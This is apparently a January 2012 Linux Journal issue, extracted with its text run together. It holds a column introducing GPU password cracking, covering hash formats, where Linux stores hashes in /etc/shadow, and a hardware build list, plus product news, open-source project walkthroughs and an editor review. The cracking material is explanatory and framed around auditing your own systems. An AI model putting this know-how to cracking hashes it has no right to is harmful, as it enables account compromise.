COLUMNSHACK AND /PasswordCracking withGPUs, Part I:the SetupKYLE RANKINBitcoin mining is so last year. Put your expensive GPU touse cracking passwords.When the Bitcoin mining craze hitits peak, I felt the tug to join this newcommunity and make some easy money.I wasn’t drawn only by the money; theconcepts behind Bitcoin mining intriguedme, in particular the new use of graphicsprocessors (GPUs). With a moderatelyexpensive video card, you could bringin enough money to pay off your initialinvestment and your electricity bill in arelatively short time.Then Bitcoin tanked. That’s okaythough, because I hadn’t gotten aroundto building my mining rig yet, andwhat’s more, I found an even moreinteresting use for Bitcoin mininghardware: password cracking. Bitcoinmining and password cracking are quitesimilar operations, and a GPU can crackpasswords much faster than a CPU oreven a small cluster of CPUs. In this twopartarticle, I explain how to set up anduse a password-cracking computer. Inthis first piece, I focus on the principlesbehind password cracking and the overallhardware setup. I’ll cover the specificattacks and command-line examples inthe following article.Legitimate Reasons to Crack PasswordsBefore I get started, let’s admit that thereare some pretty shady reasons to crackpasswords. Every so often you will heara story of a Web site that was hacked, apassword database that was compromisedand the thousands of weak passwordsthat were discovered. Often peopleget into password cracking because50 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSHACK AND /they are trying to break into someoneelse’s system, or they already broke intosomeone’s system, stole their passwordhashes and are cracking the passwords sothey can attack yet another system.That said, like with lock picking, thereare legitimate reasons to crack passwords,particularly for a sysadmin or Webmaster:n Test local users’ password strength.n Prove that users follow yourpassword policy.n Understand what your password policyshould be.n Cryptography is interesting.n Bitcoin mining is no longer profitable.In fact, many Linux systems will runa basic dictionary attack when youchange your password to evaluate howweak it is. Although it’s true that thesedays most password systems will notallow users to enter passwords thatdon’t fit the password policy, somesystems simply let users know theirpasswords are weak but store themanyway. In either case, it makes senseto audit your passwords at a companyjust to ensure that a random hackerwith a $300 video card can’t crack yourpasswords in a day or two. When youput yourself in the role of the passwordcracker, you’ll start to realize whichpasswords are easy to crack and whichones are almost impossible, and thatwill help inform you when it’s time toupdate your password policy.An Introduction to Password HashesPassword hashes were created to solve aparticularly tricky problem. If users mustenter passwords to log in, you have tostore those passwords on the systemsomehow. How do you store thosepasswords so that they’re not plain text,yet when users enter their passwords,you can tell that they are correct? Thesolution is to encrypt passwords with aone-way hash. The idea behind a onewayhash is that it is relatively easy forinput to get encrypted into the hash, butalmost impossible to convert the hashback to the original input. If you’ve everdownloaded a Linux .iso and ran md5sumon it to make sure it matched theoriginal, you were using a very popularone-way hashing algorithm, MD5. Otherpopular one-way hashes include the SHAfamily (SHA1, SHA256 and SHA512),and phpass is the modern default forPHP-based sites like WordPress.When you log in to a Linux system, thepassword you enter gets converted intoa hash with the same algorithm originallyused when you first set your password.The system compares this new hash withWWW.LINUXJOURNAL.COM / JANUARY 2012 / 51

COLUMNSHACK AND /the hash it has stored on the system, andif they match, it assumes you entered thecorrect password and you are logged in. Sofor instance, on a modern PHP site, if yourpassword was 123456, it might get storedas $P$BPlIiO5xdHmThnjjSyJ1jBICfPkpay1.How Password Cracking WorksOn a very basic level, password crackingworks much like a regular login. Youtake a password guess, run it through ahashing algorithm and compare it to theexisting hash. If it matches, you crackedthe password. The main differencebetween cracking and a regular loginis that you are doing hundreds ofthousands if not millions of thesecomparisons a second./etc/passwd and /etc/shadowThe most important thing you needbefore you crack a password is thepassword hash. Because we are talkingabout perfectly legitimate uses ofpassword cracking, this is simple. Afterall, you should have root access onyour own systems or databases, and itshould be easy to retrieve the passwordhashes. In the case of Linux logins, thesepassword hashes used to be stored inTry Before You Buy!Benchmark Your Code on Our GPU Cluster withAMBER, NAMD, or Custom CUDA CodesConfigure your WhisperStation or Cluster today!www.microway.com/tesla or 508-746-7341NEW Microway MD SimCluster with8 Tesla M2090 GPUs, 8 CPUs and InfiniBand30% Improvement Over Previous TeslasGSA ScheduleContract Number:GS-35F-0431N

COLUMNSHACK AND //etc/passwd. That seems like a logicalplace to store passwords on a Linuxsystem. The problem is, that file alsostored the user names and user IDs inuse on the system, and because of that,the file needs to be world-readable. Backwhen passwords were stored in thatfile, any local user could pull the full listof password hashes and start cracking.These days, Linux stores the passwordhashes in /etc/shadow, where they arereadable only by root. In the case ofWeb site passwords, the hashes usuallyare stored either somewhere on thefilesystem itself or often in a special usertable in a database.The second important thing you needis to know what hashing algorithm wasused for those hashes. Without that,you won’t know what type of hashingalgorithm to use for your attack. In thecase of login hashes, the hash type isstored in the password hash itself. If youlook at a password hash in /etc/shadow,you’ll notice a log of strange charactersalong with a few $ thrown in. These $characters delimit different sections ofthe hash as follows:$id $salt $encryptedMicroway’s Proven GPU ExpertiseThousands of GPU cluster nodes installed.Thousands of WhisperStations delivered.Award Winning BioStack – LSAward Winning WhisperStation Tesla – PSC with 3D‘11AWARDBESTBest NewTechnologyns/Day (Higher is Better)CPU + GPUCPU Only1.070.332.020.653.541.301 Node2 Nodes 4 NodesNAMD F1-ATP Performance GainVisit Microway at SC11 Booth 2606

COLUMNSHACK AND /The id section tells you what hash isbeing used:n 1 = MD5n 5 = SHA-256n 6 = SHA-512These days, you are most likely to runinto SHA-256 and SHA-512 passwords.Because the hashing algorithm and thesalt are stored along with the passworditself, Linux password hashes are prettyportable. If you have one hash, you cancopy it to another system and use thesame password to log in.Why Use a GPU?The simple reason to use a GPU insteadof a CPU for password cracking isthat it’s much faster. It turns out thatcracking passwords is a lot like miningBitcoins, so the same reasons GPUsare faster for Bitcoin mining apply topassword cracking. The short answer isthat there are many more specializedchips on a GPU that perform 32-bitoperations really quickly. Althougha CPU can perform a lot of generalpurposecalculations, the chips ona GPU can perform specific types ofoperations much faster, and in a muchmore parallel way. If you want morespecifics, this site explains in moredetail from the perspective of Bitcoinmining: https://en.bitcoin.it/wiki/Why_a_GPU_mines_faster_than_a_CPU.The HardwareThe most important piece of hardwareyou need to crack passwords is a fastGPU. Because cracking passwords is likemining Bitcoins, you can get a good ideaof how your GPU would perform byhow well it would mine Bitcoins.This site provides a good list ofavailable video cards and describes theirperformance: https://en.bitcoin.it/wiki/Mining_hardware_comparison. Whenyou look at that site, what you’ll noticeis that AMD GPUs tend to be muchfaster than NVIDIA GPUs, even thoughfor gaming often the reverse is true.The reason for this is explained in detailin the explanation of why a GPU minesfaster than a CPU, but in short, AMDGPUs tackle the problem of graphicsrending with a lot of small, simple chipsthat perform 32-bit operations quickly.NVIDIA GPUs have fewer, but moresophisticated chips that are closer to aCPU in complexity. For the purposes ofBitcoin mining or password cracking,which can be highly parallel, thoselarger number of simple chips workthe fastest. Also note that crackingsoftware can take advantage of multipleGPUs, so if you can afford it, and yourmotherboard can support it, you may54 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSHACK AND /find you’ll get the same performanceout of two cheaper GPUs than a singleexpensive one.In my case, I didn’t have a desktopPC lying around I could use for this, so Ibuilt a special desktop just for passwordcracking. In case you want to follow inmy footsteps, here is my exact hardwarealong with prices:n GPU: SAPPHIRE FleX 100312FLEXRadeon HD 6950 2GB: $280n Power supply: RAIDMAX HYBRID 2RX-730SS 730W: $60n Motherboard: ASUS M4A88T-V: $95n CPU: AMD Phenom II X6 1090T BlackEdition Thuban 3.2GHz: $170and power supply. Keep in mind thatmodern high-performance video cardsrequire a lot of power, so you’ll wantat least a 700W power supply in yourcase, and more than that if you intendto chain two video cards together. Ifound that the AMD 6950 had goodperformance for my budget, plus thisparticular model can theoretically beturned into a 6970 with a firmwareupdate. If you have a larger budgetthough, you may want to buy two ormore 6950s and chain them together.So there you have it. You now have amonth to get your hardware together,and next month, I’ll discuss the softwareside of password cracking, explaindictionary, brute-force and mask attacks,and give specific examples with mypassword-cracking system.■n RAM: Corsair CMX4GX3M2B2000C94Gb 240-pin DDR3: $55n Storage: Seagate ST95005620AS500GB 7200 RPM Hybrid Drive: $100Kyle Rankin is a Sr. Systems Administrator in the San FranciscoBay Area and the author of a number of books, including TheOfficial Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks.He is currently the president of the North Bay Linux Users’ Group.n Case: already ownedn Total: $760, $930 with monitor, $340just GPU + PSIf you already have a desktop thatsupports a modern video card, youmay need to purchase only the GPUResourcesWhy a GPU Mines Faster Than aCPU: https://en.bitcoin.it/wiki/Why_a_GPU_mines_faster_than_a_CPUMining Hardware Comparison:https://en.bitcoin.it/wiki/Mining_hardware_comparisonWWW.LINUXJOURNAL.COM / JANUARY 2012 / 55

NEW PRODUCTSDustin Boswell and Trever Foucher’s TheArt of Readable Code (O’Reilly Media)All the geeks among us who inhabit the programmingsubculture must admit to writing code that they’d be ashamedto show to Mom. In order to stay on Mom’s (and your boss’)good side, as well as add elegance to your work, pick up DustinBoswell and Trever Foucher’s essential new programming bookThe Art of Readable Code. The book, says publisher O’Reilly Media, “focuses on thenuts and bolts of programming, with simple and practical techniques you can use everytime you sit down to write code.” Included are numerous practical tips, easy-to-digestcode examples, helpful illustrations and cartoons to keep things entertaining. Othertopics including picking variable names that are dense with information, organizingeasy-to-understand loops and conditionals, creating effective comments, writing concisebut thorough tests and mastering the art of breaking hard problems into smaller ones.http://www.oreilly.comRadical Breeze’s Illumination Software CreatorThe hot selling point for Radical Breeze’s Illumination Software Creator, which wasrecently upgraded to version 4.1, is creating software without writing a single line ofcode. Illumination converts visual concepts into source code for the user; no virtualmachine is involved. The developed applications run natively on desktops, iPhones,iPads, Android devices, Nokia (Maemo) Internet Tablets and HTML5 and Flash Web.And, now with v4.1 for Linux, Mac OS X and Windows, you can do that in a moreexpansive and bug-free manner. Although the recent version 4.0 added ability tocreate HTML5 Web applications along with an easier method of adding graphicsto apps, the newer v4.1 nowadds a “boat-load” of bug fixes,implements and other userrequestedchanges. Radical Breezecalls Illumination Software 4.1“the most solid, bug-free releasewe have ever had. It is absolutelyglorious”. Who knew thatprogramming could be so fun?http://radicalbreeze.com56 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

NEW PRODUCTSLogic Supply’s NeousysNUVO-1003B and NUVO-1005BFanless SystemsThe hardware maker Logic Supply specializesin systems for industrial and embeddedapplications, such as its new Neousys NUVO-1003B and NUVO-1005B Fanless Systems. The HPC NUVO systems feature Intel’s Corei5/i7 Mobile CPUs and HD graphics, and are housed in a durable, sleek chassis andfeature an operating-temperature range of –25°C to 70°C. Targeted at machine vision,surveillance, medical imaging and networking applications, the devices come withthe option for three or five Intel Gigabit Ethernet ports. I/O capabilities include oneRS-232/422/485 port, three RS-232 ports, PS2 mouse and keyboard input, six USB 2.0ports, VGA and DVI/HDMI video output, which combine to ensure ease of integrationwith legacy systems and next-generation applications alike, says Logic Supply.http://www.logicsupply.com/nuvo

NEW PRODUCTSTobias Klein’s A Bug Hunter’s Diary(No Starch)Seemingly simple bugs, says author Tobias Klein, can have drasticconsequences, allowing attackers to compromise systems, escalatelocal privileges and otherwise wreak havoc on a system. In Klein’snew book, A Bug Hunter’s Diary: A Guided Tour Through the Wildsof Software Security, readers will learn how to weed out bugs byfollowing the tracks of a renowned security expert as he exploitsbugs in some of the world’s most popular software, like Apple’s iOS, the VLC media player,Web browsers and even the Mac OS X (ahem, non-Linux) kernel. In this “one-of-a-kindaccount”, readers see how the developers responsible for these flaws patched the bugs—orfailed to respond at all—gaining deep technical knowledge and insight into how hackersapproach difficult problems and experience the true joys (and frustrations) of bug hunting.Readers will learn techniques on finding bugs, exploiting vulnerabilities like NULL pointerdereferences, buffer overflows and type conversion flaws, and developing proof-of-conceptcode that verifies the security flaw and reports bugs to vendors.http://www.nostarch.comBeyondTrust’s PowerBroker IdentityServices Enterprise EditionGive your identity-management woes a slick Jujitsu move withBeyondTrust’s PowerBroker Identity Services Enterprise Edition v6.1, asolution that allows for seamless integration of Linux, UNIX and Mac OS Xwith Microsoft Active Directory. New features in PowerBroker 6.1 includesingle sign-on, reporting improvements, single rpm/deb/pkg for installation,lwconfig tool for easy management of configuration changes and improvedsupport for Mac .local domain names and network shares. With theseenhancements, PowerBroker customers now can use free, open-sourceapplication integrations for enterprise applications, such as Apache Tomcat,IBM WebSphere, Oracle WebLogic and JBoss Application Server. In addition,these updates offer the Open Source community the opportunity to providefeedback and bug fixes, as well as any other contributions to improve andaccelerate the development of the open-source tools.http://www.beyondtrust.com58 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

NEW PRODUCTSDigium and Open SourceCommunity’s AsteriskWe’re always thrilled to announce major upgrades fromthe pantheon of killer Linux apps, and this month’s staris the recently announced Asterisk 10. Asterisk is the most popular open-source platform toallow developers to create powerful business phone systems and unified communicationssolutions. Digium reports more than two million downloads in 2011 alone. In v10, CaretakerDigium and the dedicated crew of contributors have put forth a significant release whosemost important new feature is its advanced, wide-band media engine, which supportsstudio-quality audio and a nearly unlimited number of codecs. By supporting high- andultra-high-definition voice, says Digium, Asterisk now can be used to power communicationsapplications that otherwise would have required specialized or expensive equipment andservice in order to convey nuances in speech or emotion. New codec support is includedfor Digium Skype’s SILK codec and 32kHz Speex, as well as passthrough support for CELT.Other features include additional sampling rates, a new conferencing app, support forvideoconferencing, new fax capabilities and text-message routing.http://www.asterisk.orgLinux JournaLon youre-ReaderCustomizedKindle and Nookeditionsnow availablee-ReadereditionsFREEfor SubscribersLEARN MORE

NEW PRODUCTSHalcyon Software’sAudit Journal ManagerThe latest offering from Halcyon Software—whose name appropriately means calmand carefree—is a new release of Audit Journal Manager, a specialist utility for IBM ithat enables real-time alerting and reporting from the audit journal and assists withintrusion detection. Audit Journal Manager enables companies to receive immediatenotification on any attempted security breaches, monitor and report on access toconfidential information, save time on labor-intensive reporting tasks and assist inmigrating to a higher security level. Key enhancements include improved performance,the addition of new reporting templates and new “rule” sets for monitoring auditingfailure, security, service and systems management.http://www.halcyonsoftware.comPolaricon’s Jet Profiler for MySQLThis one is targeted at you MySQLers:Polaricon recently upgraded to v2.0 itsJet Profiler for MySQL—a real-time queryperformanceand diagnostics tool forDBAs and developers. Jet Profiler’s corefeatures include query, user and tablestatistics, graphical visualization, lowoverhead and ease of use. It is availablefor Linux, Mac and Windows. Via agraphical interface, users are able tobrowse through profiling information andzoom in on dedicated problem areas, such as spikes in load, allowing users to identifyand fix performance problems quickly. Besides adding German and Swedish languagesupport, version 2.0 now offers adjustable time frames for data retention and a Top IPfeature for monitoring heavy DB users and allowing for more effective load balancing.http://www.polaricon.comPlease send information about releases of Linux-related products to newproducts@linuxjournal.com orNew Products c/o Linux Journal, PO Box 980985, Houston, TX 77098. Submissions are edited for length and content.60 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

Silicon Mechanics Announces Research Cluster GrantWe are pleased to announce our sponsorshipof a unique grant opportunity:a complete high-performancecompute cluster using the latestAMD Opteron processors and NVIDIA ® GPUs.This grant program is open to all US and Canadianqualified post-secondary institutions, university-affiliatedresearch institutions, non-profit research institutions, andresearchers at federal labs with university affiliations.To download the complete rules, application, andhardware specification, visitwww.siliconmechanics.com/research_cluster_grantor emailresearch-grant@siliconmechanics.comSilicon Mechanics would also like to thank the manyhardware partners that have made this grant possible.When you partner with Silicon Mechanics,you get more than affordable, high-qualityHPC — you get a team of Experts dedicatedto the advancement of scientific research.Ocean Row Solo Expedition UpdateWave Vidmar has adjusted his schedule. He will be shipping “Liberty” to Portugal for a February launch to row theNorth Atlantic East-to-West route, heading for an area north of the Caribbean Islands. He is currently planning toundertake the West-to-East Row in May. We will continue to follow his expedition at siliconmechanics.com/ors.

NEW PROJECTSFresh from the LabsEKO—Speedy Sound Editinghttp://eko.sourceforge.netIf you’re sick of big, clunky sound editorsand minimalist, feature-lacking editors,EKO may well strike the balance you’relooking for. According to the Web site:EKO is a simple sound editor. EKOunderstands all popular sound formats(except MP3) and is useful in simpleediting (cut/copy/paste) with minimalFX processing. External FX currentlyare not supported.Installation At the time of thiswriting, only the source was available—no binaries. But, fear not; installing bysource isn’t hard.Regarding library requirements, accordingto the documentation, you need Qt 4.x,libJACK, libsndfile and libsamplerate.Although this is true, as is always the casewith source, you also need to install the-dev development packages in order tocompile the source code.Once the dependencies are out ofthe way, install EKO with the followingcommands:EKO—the lightweight sound editor in its sleekwinter color scheme.Ubuntu), enter:$ sudo make installIf your distro uses root, enter:$ su# make installOnce the installation has finished,you can run EKO with this command:$ qmake$ makeIf your distro uses sudo (such as$ ekoUsage Inside the EKO screen, thingsactually are pretty easy and intuitive,62 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

NEW PROJECTSEKO is designed largely around using Jack, with the FX rack loading automatically.and EKO’s main features are obviouslyplaced. Right from the get-go, EKO isready to open a sound file and startediting, and rather tellingly, the FX rackalso opens at startup (an instant pictureof the author’s feature wishes and EKO’sdesign principles).Click Open file on the main toolbar,choose an audio file to edit, and let’sexplore EKO’s features.With a sound file on-screen, theobvious Start and Stop controls are ina bold purple, with a check box forlooping on their left. Click anywhere onthe wave, and you can play from there,select a section and loop it, and so on.However, the interesting bit is the FXrack window on the right.As you’re no doubt aware, EKO usesJack for its audio interface, and theeffects in the FX rack need Jack tooperate. However, keen observers willnotice that at no time have I mentionedstarting Jack in the instructions. As itturns out, EKO actually starts Jack foryou with its default settings, if it’s notalready running (thankfully, you also havethe choice of running Jack with your ownsettings before starting EKO, after whichEKO skips the Jack step).WWW.LINUXJOURNAL.COM / JANUARY 2012 / 63

NEW PROJECTSAlthough the FX rack was quitelimited at the time of this writing (onlyfour effects in total: amplification,EQ, overdrive and pitch shifting),author Peter Semiletov has chosenwisely in implementing perhaps themost useful features before expandingEKO’s capabilities. While using Jackwith effects generally involves somecomplicated routing, EKO’s use of itscurrent effects already has the routingdone for you.If you want to immerse yourself morewithin the screen, you can chooseView→Toggle fullscreen. If the colorscheme is throwing you off, check outthe palettes in the view menu (winter ismy favorite choice).If you want to tweak your settingsfurther, look to the right of the window,and you’ll see four tabs. Click on tune.For the more superficial aspects, youcan change the UI settings, such as font,icon size and window styling under theInterface tab. However, more importantsettings are in the other tabs, such asa large choice of keyboard shortcuts.Under the Common tab, you canchoose the default format for newfiles and define the re-samplingquality for playback.Eagle-eyed readers also will notice thatEKO can down-mix 5.1 to stereo—perhapsthis will be reason enough for many usersto fire up EKO from time to time?EKO is very speedy, and there isgood reason for that: it loads theproject files into RAM. Obviously,there’s a cost for this speed. You’llneed a lot of system RAM for this, andI assume larger projects will requiresomething that uses the hard drive. Italso seems to be an editing-only suite,not for recording, but who knows whatdirection it’ll go?Nevertheless, this early project showsa lot of promise as a genuinely fast,simple and usable editor that fills aniche between Goliaths like Ardourand simpler programs that are just toolimited. I’ll be interested to see wherePeter takes it.QLC—Free Lighting Controlhttp://qlc.sourceforge.netMy last article covered the OLA lightingproject with the Arduino RGB device, andbecause of some dependency problemsat that time, I had to skip over therecommended QLC application and usethe given Web interface.However, now I’m delighted to say I’vegot QLC working without a hitch, and Icover it here (although I should mention,QLC is in no way connected with theArduino RGB or OLA projects, but is forlighting in general).According to the Web site:Q Light Controller is a cross-platformapplication for controlling DMX oranalog lighting systems like movingheads, dimmers, scanners and so on.The goal is to replace hard-to-learn64 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

NEW PROJECTSand somewhat limited commerciallighting desks with FLOSS.Installation If you’re chasing a binary,packages are provided for Debian,Ubuntu, Red Hat, Fedora and Mandriva.If you want (or need) to go with thesource option, you first need to installSubversion, as that is the given option forattaining source with QLC. As for libraryrequirements, the documentation givesthe following for Debian and Ubuntu:g++, make, libqt4-dev, qt4-dev-tools,libasound2-dev, libusb-dev, subversion,debhelper and fakeroot.Ubuntu further requires libftdi-dev andpkg-config.Whereas Red Hat/Fedora users needgcc-c++, qt4-devel, libftdi-devel,libusb-devel, alsa-lib-devel, rpm-buildand subversionIf you prefer the source, make afolder in which you want to buildQLC, and then open a terminal inthat new directory. Now, enter thefollowing commands:$ svn checkout https://qlc.svn.sf.net/svnroot/qlc/trunk/ qlc$ cd qlc$ svn updateA quick note: any Arduino RGB and/orOLA users will have to enable a plugin,which also requires using the source viasvn. If you’re pursuing this option, grab thesource as above, and edit the plugins.profile in the plugins folder.When editing scenes, you can play with lightingeffects in real time.Uncomment the following line bychanging this:#unix:SUBDIRSto this:unix:SUBDIRS+= olaout+= olaout(Of course, all other users can ignorethis section and continue.)Now, to compile the program, enter:$ qmake-qt4$ makeTo install QLC, if your distro uses sudo(such as Ubuntu), enter:$ sudo make installWWW.LINUXJOURNAL.COM / JANUARY 2012 / 65

NEW PROJECTSA very basic demonstration of two buttons in Operate mode, linked to two scenes.If your distro uses root, enter:$ su# make installTo run the program, use this command:$ qlc(Note: OLA users should start oladbefore running QLC.)Usage Inside the program, QLC’sinterface is spread into five mainsections: Fixtures, Functions, Outputs,Inputs and Virtual Console. To startusing QLC, click on the Fixtures tab.Here in Fixtures, you tell QLC whatlighting hardware you’re using anddefine its parameters.Like the giant text suggests, click the+ button to add fixtures. This bringsup a new window with an array oflighting fixtures from which to choose.My correspondent, Heikki Junnila,was using the Eurolite LED PAR56model, which he set to Address 1,Universe 1, with Amount 1. With myhumble little Arduino, the model wasGeneric→Generic, which was set toUniverse 1, Address 0, and the Channelswere set to 6 (the number of lights I hadattached to the board).With the fixtures defined, it’s time tointeract with the hardware by makinga scene.Click on the Functions tab, andin the Functions toolbar, you’ll seea series of new icons. Click the66 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

NEW PROJECTSA preview shot of the upcoming QLC release in full flight—much more impressive than mylame demonstrations!button on the left, New scene, anda new window appears. Click the +button and choose the fixture to beused (likely just one if it’s your firsttime). Back in the scene window, youprobably should enter a name in thegiven field before proceeding further.But, to do something interesting,click on the second tab, which willbe named after the fixture type(“Dimmers” in my case).Here you can play with your lightingdevice in real time, experimenting withthe look of a scene, then committing thelighting scene later. Back in the Generaltab, if you look down at the bottom ofthe window, there are some lovely FadeIn and Fade Out options, which I promisewill look fantastic if you try them.While I’ve shown you how to makeone scene, you should repeat the samesteps for a second scene, but withdifferent values (perhaps activatingdifferent lights or different levels). Thisway you can explore the Chaser functionwith an obvious visual transition to showoff its abilities.What is this Chaser function, youask? Basically it’s the means to stringtogether your scenes. With functions,such as looping and sequences, chasersare really what turn your scenes intoan actual show.To use them, simply head back to theWWW.LINUXJOURNAL.COM / JANUARY 2012 / 67

NEW PROJECTSwindow where you made the scenes,and on the toolbar, click the next buttonalong from New scene (yes, the littlegreen arrow in the orange ball), and thisbrings up the Chaser editor.In the new window, first give yourchaser a name. Now, press the +button, choose the scenes you wantto add, and click OK. Back in theChaser editor window, you can dictatehow the whole sequence works,right down to the order in which thescenes run, whether they loop or playonce through, and the duration. Thiswindow is really where the designaspect comes to the fore.As I’m running out of space, let’s jumpto the Virtual Console, where I guessyou could say the live direction happens.The basic idea is that you place a buttonsomewhere in the workspace and thenlink it to something like a scene, effector chaser. This way, you can have a seriesof labeled buttons, so if you’re lightinga stage play, for example, you can click abutton to have specific lighting for onescene and then click another button tochange the lighting for the next.The first button on the toolbar makesthe new button, placing it in theworkspace below. Then, right-click thebutton and choose Properties. Here youdo all of the usual stuff, like labeling thebutton, but most important, you needto choose the function it activates, andthe icon with the attached plugs doesthis. Choose the functions you want toactivate, click OK, and then click OKagain in the Button window to head backto the main screen.Now for one last instruction. If youleft-click the button now, nothing willhappen. See that big blue Play buttonabove? Click that, and it switches QLCto Operate mode (it also changes to aStop button, which switches back todesign mode when you’re done). Clickyour buttons now, and hey, presto,your lighting effects are running byyour command!Although total novices may find QLCto be hard to come to grips with initially,the interface is actually very well thoughtout, and after you’ve been through theprocess once, things should come to youintuitively. It also appears to be quiteextensible in design, so I imagine it willbecome rather powerful as time goes on.Hopefully, Q Light Controllereventually becomes the easy choicefor anyone new to lighting, thoseon a budget, or maybe it even willpersuade some away from theirexpensive proprietary software!■John Knight is a 27-year-old, drumming- and bass-obsessed maniac,studying Psychology at Edith Cowan University in Western Australia.He usually can be found playing a kick-drum far too much.BREWING SOMETHING FRESH, INNOVATIVE OR MIND-BENDING? Send e-mail to newprojects@linuxjournal.com.68 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

REVIEWSlickEditFor the minimalist programmer, there’s vim. For everybody else,there’s SlickEdit. SHAWN POWERSI fell in love with SlickEdit a fewyears ago when I noticed its adson our Web site. Although mostcompanies use the sort of Webads you’d expect in the techindustry, I took a second lookwhen LOLCat images appearedin the place of our regular ads.Admittedly, for a moment Ithought perhaps we’d beenhacked, but when I realized I waslooking at a clever marketingcampaign, I decided the folks at SlickEditwere okay in my book. I recently had thechance to review SlickEdit, and althoughmy programming skills are fairly novice,SlickEdit made me feel right at home.SlickEdit is a text editor designed forprogrammers. Calling SlickEdit a texteditor, however, is much like calling theDeLorean from Back to the Future a dailydriver. SlickEdit makes the line betweentext editing and full-blown IDE pretty fuzzy.It is available for nine platforms, and,thankfully, Linux is one of them. In thisreview, I take a look at its features, andyou can decide whether it’s a text editor,IDE or something in between.InstallationInstallation is fairlystraightforward if you’veever installed a closed-sourceapplication in Linux. Both32- and 64-bit versions areavailable, and on the handfulof systems on which I installedit, I didn’t run into anyproblems with dependencies.The installation must beperformed on the commandline, as there is interaction duringthe install (Figure 1). By default, theprogram is installed into the /opt/slickeditdirectory. (Thanks to the SlickEditfolks for not using weird capitalizationin the installation directory; that isso frustrating.)Starting SlickEdit the first time is alittle cumbersome, because the installerdoesn’t appear to make any icons inthe system menu or on the desktop. Adesktop icon is created after the firstlaunch of SlickEdit, but you have to getpast the catch 22 of needing to start theprogram to create the program startupicon. The executable to start SlickEdit by70 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

REVIEWFigure 1. Installation must be done on the command line; there isno GUI installer.Figure 2. The keystroke emulation makes SlickEdit behave likeyour favorite editor.default is /opt/slickedit/bin/vs,and typing that in a command shell startsthe program and its initialwizard right up.During the Quick StartWizard, you start to seesome of SlickEdit’s neatfeatures. Figure 2 showsthe configuration screenfor selecting keyboardemulation. If you’re usedto a particular set ofkeybindings (like vim inmy case), SlickEdit can usethose familiar keybindingsby default. You even cancustomize the emulationif your needs don’t lineup with the dozen-plusemulation options offered.One of the other neatfeatures configuredduring the initialwizard phase is thecustomization of howyou prefer your codeto look. Figure 3 showsindentation and bracestyleconfigurationsthat can be set forall languages. Theindentation and methodsfor displaying braces andparentheses certainlydon’t change thecompiled product, but they make codelook however you prefer. And, a happyWWW.LINUXJOURNAL.COM / JANUARY 2012 / 71

REVIEWFigure 3. If SlickEdit is going to save time, it needs to know how you prefer to format your code.coder is an efficient coder, right?You can change many other initialsettings, such as color themes, font sizeand choice and so on. Once configured,you even have the option to export yoursettings so they can be imported onanother machine. It’s a great feature ifyou use SlickEdit at home and at work,in order to ensure your developingenvironments match.Initial ImpressionOnce the initial quickstart is complete,it’s easy to be overwhelmed by thefeature set. Thankfully, althoughSlickEdit boasts an incredible number offeatures, understanding them all isn’ta prerequisite for coding. As shown inFigure 4, I jumped right in with a simpleBash script to see how well it handlescode formatting. As expected, it looksand behaves quite nicely.Next, I tried to work with one ofSlickEdit’s new features, namely Gitrepository interaction. Here, I wasmet with some frustration. AlthoughI could get SlickEdit to recognizemy local cloned Git repository,72 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

REVIEWKeyboard EmulationAs I mentioned earlier, this is anadvantage for coders coming fromother programs. The ability to customizeindividual keystrokes is nice, but it’sthe built-in support for other familiarprogram keybindings that makes thisfeature so great. Emacs fan? You don’tneed to learn new keystrokes to edit yourcode. Vim master? Same deal—you cansave and close a file like God intendedby pressing :wq.Language SupportAs a programmer, I’m personally limitedto a handful of languages. In fact,when it comes to Java, I can’t even sayhello to the world. SlickEdit takes meto task in this department, supportingmore than 40 languages. To be fair,some of those languages are specific totheir platform (that is, Microsoft), butI couldn’t think of a single language itdoesn’t support.One of the advantages of using a toollike SlickEdit is that because it knowslanguages you might not be intimatelyfamiliar with, it’s a great tool forjumping right in to unfamiliar codewith unfamiliar syntax (which leadsto my next favorite feature).AutocompletionAlthough not exactly SkyNet-typeartificial intelligence, SlickEdit doessave time by automatically completingyour commands—and with theproper language-specific syntax. Forexample, if you type for and pressthe spacebar inside a C++ document,SlickEdit automatically creates theparentheses and curly braces neededto complete the conditional loop. I findthis incredibly helpful when switchingbetween languages, because compilersaren’t as forgiving with incorrect syntaxas the human brain might be.Autocompletion doesn’t stop withcode syntax, however; SlickEdit alsoautocompletes any symbols or wordswhile you type. This is great for longsymbols or variable names. SlickEditsearches your open document in realtime for matches and pops up a boxwith the matches it finds. If you don’twant to use autocomplete, simplyignore the pop-up box and keep typing.Focus isn’t taken away from whatyou’re typing.BackupAs I’ve mentioned, SlickEdit supportsrevision control systems like Git, but italso keeps a history of changes everytime a file is saved. Even if you haven’tcommitted your changes, you still cansee the history of changes made to yourfiles. Access to the save history reallycan save your bacon if you accidentallysave an error by mistake.DIFFzillaSlickEdit uses a tool called DIFFzillato compare files. It’s also possible to74 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

REVIEWFigure 5. DIFFzilla adds things like the “Imaginary Line Buffer” in order to line up code so it’s easier to see.compare folders full of files or activebuffers in the editor. What makesDIFFzilla great is that it does its best jobto reformat non-compilable differences(like whitespace or line breaks wherethey don’t matter) in order to displaythe code side by side. This may seemlike a minor feature, but it makescomparing files line by line a breeze. Infact, you can edit the code directly fromthe DIFFzilla window, and the updatesare written back to the location whereyou opened the file. Figure 5 showsDIFFzilla in action.Code TemplatesFor programmers who use chunks ofcode over and over (the foundationof FOSS, no?), SlickEdit supports codetemplates. Basically, any common codingelements can be saved as a templateand used in a project easily. Re-usingcode isn’t revolutionary by any means,but the templating system makes it easyto do. By using templates, there is nolonger a need to search/replace the filesto make it match your project. SlickEditautomatically changes the specified partsof the template to match your needs.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 75

